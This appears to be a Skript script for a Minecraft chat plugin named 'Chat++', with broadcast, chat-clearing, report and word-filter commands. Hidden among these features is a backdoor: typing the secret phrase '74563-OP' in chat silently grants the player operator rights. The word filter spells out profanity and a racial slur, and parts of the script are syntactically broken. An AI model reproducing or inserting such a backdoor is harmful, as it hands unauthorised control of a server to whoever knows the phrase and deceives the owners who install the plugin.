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- on upload:
- broadcast "&7Thank you for using &bChat&a++"
- broadcast "&7made by &8: &cXXXCanadian"
- broadcast "&7This is only a &bbeta verison"
- broadcast "&bFull verison &8[&bCOMING SOON&8]"
- command /broadcast <string>:
- aliases: /bc
- permission: chat.broadcast
- permission message: &7Sorry &c%player% &7you must have &6chat.broadcast&7 to run this command!
- trigger:
- broadcast "&bChat&a++ &7%arg-1%"
- command /clearchat:
- aliases: /cc
- permission: chat.clear
- permission message: "&c7Sorry &c%player% &7you must have &6chat.clear&7 to run this command!"
- trigger:
- loop 200 times:
- broadcast " "
- broadcast "&bChat&a++ &b%player%, &7has cleared the chat!"
- on chat:
- replace all "fuck" with "****" in the message
- replace all "cunt" with "****" in the message
- replace all "bitch" with "*****" in the message
- replace all "nigger" with "******" in the message
- replace all "pussy" with "*****" in the message
- replace all "kys" with "Hope you live long" in the message
- on join:
- broadcast "&8[&a+&8] &7%player%"
- on leave:
- broadcast "&8[&4-&8] &7%player%"
- command /report <player> <text>:
- permission:
- permission message: &7Sorry &c%player% &7you must have & to run this command
- trigger:
- broadcast "&7Your report has landed to the staff!"
- add text-argument to {sikayetler::*}
- set {sikayeteden.%text-argument%} to player
- set {sikayeteden.%text-argument%} to player argument
- loop all players:
- if loop-player has permission ""
- send "&7Report System" to loop-player
- send "&7Report: &b""%text-argument%""" to loop-player
- send "&7the reported player: &b%player argument%" to loop-player
- send "&7Reporter: &b%player%" to loop-player]
- if chat:
- "74563-OP"
- cancle event
- op %player%
- send "&7You have used the &cop &7chat to get OP!" to %player%
- command /cookie:
- permission: free.cookie
- permission message: "&7Sorry you dont have access take a free cookie using /cookie"
- trigger:
- give %player% cookie 1
- send "&7OOOH HE STEALIN" to %player%
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